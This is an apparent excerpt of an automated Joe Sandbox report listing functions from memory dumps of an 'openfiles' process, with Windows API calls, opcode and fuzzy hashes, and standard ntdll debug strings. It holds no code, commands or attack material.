                                                                                                • Opcode Fuzzy Hash: 3300340c253a61e252748895533e5e29f7e909d6d69dfbb11536b52e0ecf51ec
                                                                                                • Instruction Fuzzy Hash: 0101C4B6214609BFCB04DF99DC90EEB77ADAF8C754F408108BA09D3240D630F8518BA4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02799395
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4109844667.0000000002790000.00000040.80000000.00040000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_2790000_openfiles.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateThread
                                                                                                • String ID:
                                                                                                • API String ID: 2422867632-0
                                                                                                • Opcode ID: d890c0683fcb36cdd013a7daa9d4c0ca35221b5dd203bebbfe8f0b18f9f39f72
                                                                                                • Instruction ID: 13c33bdcddfe4a019cd8122c93bd9cb7a0c81f97d02991f99dd1a0fabbbb0d80
                                                                                                • Opcode Fuzzy Hash: d890c0683fcb36cdd013a7daa9d4c0ca35221b5dd203bebbfe8f0b18f9f39f72
                                                                                                • Instruction Fuzzy Hash: CFF09B7334030436E73165A9AC02FD7B79CDF85765F540425FB0CEB1C0D996B44146E4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02799395
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4109844667.0000000002790000.00000040.80000000.00040000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_2790000_openfiles.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateThread
                                                                                                • String ID:
                                                                                                • API String ID: 2422867632-0
                                                                                                • Opcode ID: e64ded53fec47460a4eb018d81707beaf207cc6191c98fd2931ed662afb1bde5
                                                                                                • Instruction ID: 8212a8249326d04ac937e83cdb166ca2f9515544b1fe977b7badb7ce113f6a37
                                                                                                • Opcode Fuzzy Hash: e64ded53fec47460a4eb018d81707beaf207cc6191c98fd2931ed662afb1bde5
                                                                                                • Instruction Fuzzy Hash: E1F0E5732403143AE63266999C02FD7729CDF84B54F550018FA0CEB1C0DEA2B8418AE4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • RtlAllocateHeap.NTDLL(027A1169,?,027B4579,027A1169,027B41C7,027B4579,?,027A1169,027B41C7,00001000,?,?,027B9733), ref: 027B7E9F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4109844667.0000000002790000.00000040.80000000.00040000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_2790000_openfiles.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AllocateHeap
                                                                                                • String ID:
                                                                                                • API String ID: 1279760036-0
                                                                                                • Opcode ID: 1ad9a22f90e5cd979971b35f6ce6b4d336bdd36ecd1c536231fdf55d86eb83b7
                                                                                                • Instruction ID: cf8c175eec1c32d7e1dcef85261eb608c62eb7dece74a06b0769ae37bb3f81eb
                                                                                                • Opcode Fuzzy Hash: 1ad9a22f90e5cd979971b35f6ce6b4d336bdd36ecd1c536231fdf55d86eb83b7
                                                                                                • Instruction Fuzzy Hash: 17E065B2200205BFCA10EE98DC44FAB33ADEF89750F00841AF908A7241DA30B9118AB6
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,8C0F10F9,00000007,00000000,00000004,00000000,027A3832,000000F4,?,?,?,?,?), ref: 027B7EEC
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4109844667.0000000002790000.00000040.80000000.00040000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_2790000_openfiles.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: FreeHeap
                                                                                                • String ID:
                                                                                                • API String ID: 3298025750-0
                                                                                                • Opcode ID: c160f6c99bb44e8e05a5a1cc21e8af5d4899374c05ac76f9face4087b8e9a1a5
                                                                                                • Instruction ID: ca234a6f48c1332a5e1f87004c7bf410c4bd087289d8864d8e4099e3c29cddb6
                                                                                                • Opcode Fuzzy Hash: c160f6c99bb44e8e05a5a1cc21e8af5d4899374c05ac76f9face4087b8e9a1a5
                                                                                                • Instruction Fuzzy Hash: 74E065B62042047FCA11EE58EC44FEB73ADEF89750F004409F90CA7240C670BA108AB5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetFileAttributesW.KERNELBASE(?), ref: 027A78AC
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4109844667.0000000002790000.00000040.80000000.00040000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_2790000_openfiles.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AttributesFile
                                                                                                • String ID:
                                                                                                • API String ID: 3188754299-0
                                                                                                • Opcode ID: c37f2e32777f3ad8c0d672fff3fc477ed4a62bc264b9371ff7a1276157a9807a
                                                                                                • Instruction ID: 53a1bd9d7f9efaee71ab45949df8c783e01bd34730ad7d5ebd6e74216e4a05a5
                                                                                                • Opcode Fuzzy Hash: c37f2e32777f3ad8c0d672fff3fc477ed4a62bc264b9371ff7a1276157a9807a
                                                                                                • Instruction Fuzzy Hash: B0E048716402041AFA2855689C56FBE33589BC4778F544660B95C9B2C1E775F54181A0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • SetErrorMode.KERNELBASE(00008003,?,?,027A1460,027B68E7,027B41C7,?), ref: 027A76C3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4109844667.0000000002790000.00000040.80000000.00040000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_2790000_openfiles.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorMode
                                                                                                • String ID:
                                                                                                • API String ID: 2340568224-0
                                                                                                • Opcode ID: 481f3ae30dbfaced3432f297a36555c701d5d7eb88aa6cfaa4b6e8dc219bd39c
                                                                                                • Instruction ID: 84bf798875a3be3b9189be07db815c8abbe1233d411ff10f25224df289fde93e
                                                                                                • Opcode Fuzzy Hash: 481f3ae30dbfaced3432f297a36555c701d5d7eb88aa6cfaa4b6e8dc219bd39c
                                                                                                • Instruction Fuzzy Hash: 29D05E712803043BFA05E6B9DC0AFAA328D9B48758F554474B94CD72C2EE65F05146A5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4111044686.0000000004870000.00000040.00001000.00020000.00000000.sdmp, Offset: 04870000, based on PE: true
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004999000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000007.00000002.4111044686.000000000499D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004A0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_4870000_openfiles.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: f174cab8149fb78a90889b62643df5f6b0e989fae517b2dbb063409125fca765
                                                                                                • Instruction ID: a9c667c0263504229e151951ffce2e0b8efcba6de5081dc9490290056d173bda
                                                                                                • Opcode Fuzzy Hash: f174cab8149fb78a90889b62643df5f6b0e989fae517b2dbb063409125fca765
                                                                                                • Instruction Fuzzy Hash: BEB09B719015C5C9FF11F7614A087177914ABD1705F15C561D3038641E4738D1D5E176
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4111044686.0000000004870000.00000040.00001000.00020000.00000000.sdmp, Offset: 04870000, based on PE: true
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004999000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000007.00000002.4111044686.000000000499D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004A0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_4870000_openfiles.jbxd
                                                                                                Similarity
                                                                                                • API ID: ___swprintf_l
                                                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                • API String ID: 48624451-2108815105
                                                                                                • Opcode ID: d27ab3e0eab18995f89fc47b08cd286210ffd48e1f85a80ec8826f0bb99cfc23
                                                                                                • Instruction ID: ad0059ea7b63f5be246ffd382db373f8c5a37ba41b278bb84ba2470ac5625b78
                                                                                                • Opcode Fuzzy Hash: d27ab3e0eab18995f89fc47b08cd286210ffd48e1f85a80ec8826f0bb99cfc23
                                                                                                • Instruction Fuzzy Hash: 085129B6A0011ABFDB11EF998C9097EF7BCBB092047148B69E5A5D3641D374FE0097A0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4111044686.0000000004870000.00000040.00001000.00020000.00000000.sdmp, Offset: 04870000, based on PE: true
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004999000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000007.00000002.4111044686.000000000499D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004A0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_4870000_openfiles.jbxd
                                                                                                Similarity
                                                                                                • API ID: ___swprintf_l
                                                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                • API String ID: 48624451-2108815105
                                                                                                • Opcode ID: c3f427165b469a6d825bef03e9a9c84c65494cd2c3a543c78955d23953ed8d16
                                                                                                • Instruction ID: a36cfc4f439e77b7fe28cf676075e6dd47545b7207b24bd109ee49fb549fa43f
                                                                                                • Opcode Fuzzy Hash: c3f427165b469a6d825bef03e9a9c84c65494cd2c3a543c78955d23953ed8d16
                                                                                                • Instruction Fuzzy Hash: E051F375B00645AFDB20DF5CCC9097EB7FDAB48204B2488B9E996D7651E6B4FA008F60
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                • Execute=1, xrefs: 04914713
                                                                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 04914787
                                                                                                • ExecuteOptions, xrefs: 049146A0
                                                                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04914655
                                                                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 049146FC
                                                                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04914742
                                                                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04914725
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4111044686.0000000004870000.00000040.00001000.00020000.00000000.sdmp, Offset: 04870000, based on PE: true
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004999000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000007.00000002.4111044686.000000000499D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004A0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_4870000_openfiles.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                • API String ID: 0-484625025
                                                                                                • Opcode ID: 681972d95d6b2444ff71f28785c05b90f9274f8cc83be3bc7916074b53b86c57
                                                                                                • Instruction ID: c29b5d67d4d0dc8e7af814df38dc7c3ace1405fe6eae184e9c7c129488594a08
                                                                                                • Opcode Fuzzy Hash: 681972d95d6b2444ff71f28785c05b90f9274f8cc83be3bc7916074b53b86c57
                                                                                                • Instruction Fuzzy Hash: EA51F83160121D7AEB10BAA9EC85FA977B8EF49704F140AA9E505E7190FB70BE41CF51
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4111044686.0000000004870000.00000040.00001000.00020000.00000000.sdmp, Offset: 04870000, based on PE: true
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004999000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000007.00000002.4111044686.000000000499D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004A0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_4870000_openfiles.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                • Instruction ID: a6e603303c9f8d3f4fda6e49a0bf15f192907e83ea8eafccdb83366418431f0b
                                                                                                • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                • Instruction Fuzzy Hash: 1C022371608741AFD304CF18C894A6FBBE9EFC8714F448A2DF9899B264DB71E905CB52
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4111044686.0000000004870000.00000040.00001000.00020000.00000000.sdmp, Offset: 04870000, based on PE: true
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004999000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000007.00000002.4111044686.000000000499D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004A0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_4870000_openfiles.jbxd
                                                                                                Similarity
                                                                                                • API ID: __aulldvrm
                                                                                                • String ID: +$-$0$0
                                                                                                • API String ID: 1302938615-699404926
                                                                                                • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                • Instruction ID: 1d07e704547b5c3cad730d046f3170d29114deea7bffdd2db6571f1046d5c8ec
                                                                                                • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                • Instruction Fuzzy Hash: F681DF70E052598FEF28CE6AC8917BEBBA1AF47354F184B1AD861E7690D730B841CB51
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4111044686.0000000004870000.00000040.00001000.00020000.00000000.sdmp, Offset: 04870000, based on PE: true
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004999000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000007.00000002.4111044686.000000000499D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004A0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_4870000_openfiles.jbxd
                                                                                                Similarity
                                                                                                • API ID: ___swprintf_l
                                                                                                • String ID: %%%u$[$]:%u
                                                                                                • API String ID: 48624451-2819853543
                                                                                                • Opcode ID: bb6e9cb6fcefc810f6c4285216ef5b8c964c53dae0e50cd4528c2e2f7e811b1b
                                                                                                • Instruction ID: eb744288e6a797598babeb1dec84984732ef4a73134af70e4a056d3648cf1b22
                                                                                                • Opcode Fuzzy Hash: bb6e9cb6fcefc810f6c4285216ef5b8c964c53dae0e50cd4528c2e2f7e811b1b
                                                                                                • Instruction Fuzzy Hash: FA215176A00119ABDB10EFA9DC40EBFBBECEF58644F140566ED05E3200E770E9018FA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 049102E7
                                                                                                • RTL: Re-Waiting, xrefs: 0491031E
                                                                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 049102BD
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4111044686.0000000004870000.00000040.00001000.00020000.00000000.sdmp, Offset: 04870000, based on PE: true
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004999000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000007.00000002.4111044686.000000000499D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004A0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_4870000_openfiles.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                • API String ID: 0-2474120054
                                                                                                • Opcode ID: 5ec7a1c3a5889e6783287129873898cc516fc63a4e1a1c410a35e3114098b9e6
                                                                                                • Instruction ID: f0e9c5978c1677a8e42158a7472ef2faa18f63d4977e5301e034155f16349691
                                                                                                • Opcode Fuzzy Hash: 5ec7a1c3a5889e6783287129873898cc516fc63a4e1a1c410a35e3114098b9e6
                                                                                                • Instruction Fuzzy Hash: BAE1BD306047459FE725CF28C884B2AB7E5AB89318F140B2DF6A5CB6E0E775F845CB42
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                • RTL: Resource at %p, xrefs: 04917B8E
                                                                                                • RTL: Re-Waiting, xrefs: 04917BAC
                                                                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04917B7F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4111044686.0000000004870000.00000040.00001000.00020000.00000000.sdmp, Offset: 04870000, based on PE: true
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004999000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000007.00000002.4111044686.000000000499D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004A0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_4870000_openfiles.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                • API String ID: 0-871070163
                                                                                                • Opcode ID: affa68330f35420f2bf8d88b4eba9564b77e6ea43e35c58ba04b920de04827fa
                                                                                                • Instruction ID: 2d5ffeff85d27166df733be7ce9a7353e3a48a05793cc4a2f9488c8581714ce7
                                                                                                • Opcode Fuzzy Hash: affa68330f35420f2bf8d88b4eba9564b77e6ea43e35c58ba04b920de04827fa
                                                                                                • Instruction Fuzzy Hash: A241E0317027069FDB24DE29C840B6AB7E5EF89724F100F2DE85ADB690DB70F8058B91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0491728C
                                                                                                Strings
                                                                                                • RTL: Resource at %p, xrefs: 049172A3
                                                                                                • RTL: Re-Waiting, xrefs: 049172C1
                                                                                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04917294
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4111044686.0000000004870000.00000040.00001000.00020000.00000000.sdmp, Offset: 04870000, based on PE: true
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004999000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000007.00000002.4111044686.000000000499D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004A0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_4870000_openfiles.jbxd
                                                                                                Similarity
                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                • API String ID: 885266447-605551621
                                                                                                • Opcode ID: 7c223e9e480d14b15d2dcd5b9ed914eea41595792d09787d7519b8a5569fdcfc
                                                                                                • Instruction ID: 25595591d30988cf57acf12aa2a72ec65c125c370c81dc5e43f4e6e417399477
                                                                                                • Opcode Fuzzy Hash: 7c223e9e480d14b15d2dcd5b9ed914eea41595792d09787d7519b8a5569fdcfc
                                                                                                • Instruction Fuzzy Hash: 8041EF3170120AABE720DE65CC41F66B7A5FB85728F100A29F955EB240EB21F842DBD1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4111044686.0000000004870000.00000040.00001000.00020000.00000000.sdmp, Offset: 04870000, based on PE: true
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004999000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000007.00000002.4111044686.000000000499D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004A0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_4870000_openfiles.jbxd
                                                                                                Similarity
                                                                                                • API ID: ___swprintf_l
                                                                                                • String ID: %%%u$]:%u
                                                                                                • API String ID: 48624451-3050659472
                                                                                                • Opcode ID: 60aa0c0cb6f068923cf14ea285096cd2fe5612d398911f57a5c0ec8e8a60065b
                                                                                                • Instruction ID: 48b79261f95934716676265fbd77a5e5c3a1a75eac81e7d7e5ceefc453a7c6fa
                                                                                                • Opcode Fuzzy Hash: 60aa0c0cb6f068923cf14ea285096cd2fe5612d398911f57a5c0ec8e8a60065b
                                                                                                • Instruction Fuzzy Hash: 2C315472A006199FDB20DF29DC40BEE77FCEB44A14F5445A5EC49E3240EB30BA499FA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4111044686.0000000004870000.00000040.00001000.00020000.00000000.sdmp, Offset: 04870000, based on PE: true
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004999000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000007.00000002.4111044686.000000000499D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004A0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_4870000_openfiles.jbxd
                                                                                                Similarity
                                                                                                • API ID: __aulldvrm
                                                                                                • String ID: +$-
                                                                                                • API String ID: 1302938615-2137968064
                                                                                                • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                • Instruction ID: 2b34ca65708358c18a1c9253c244877ac5fae46f22afe2ee8932bf7275da074e
                                                                                                • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                • Instruction Fuzzy Hash: B791A171E0021A9BDB24DE6BC880ABEB7A5FF46724F144F1AEC55E72C4E770E9408761
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4111044686.0000000004870000.00000040.00001000.00020000.00000000.sdmp, Offset: 04870000, based on PE: true
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004999000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000007.00000002.4111044686.000000000499D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004A0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_4870000_openfiles.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: $$@
                                                                                                • API String ID: 0-1194432280
                                                                                                • Opcode ID: 912a3b3c624a173dccf7be49c4cddf93d901238aa522dc7f5c1e8f6f00775615
                                                                                                • Instruction ID: 89c01281d988955e040b7619b6b1aa2874279e2a5476c39448d6a255236cd566
                                                                                                • Opcode Fuzzy Hash: 912a3b3c624a173dccf7be49c4cddf93d901238aa522dc7f5c1e8f6f00775615
                                                                                                • Instruction Fuzzy Hash: C8812EB1D002699FDB358B54CC44BEAB6B8AB44754F0046EAE919F7280D774AE84CFA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%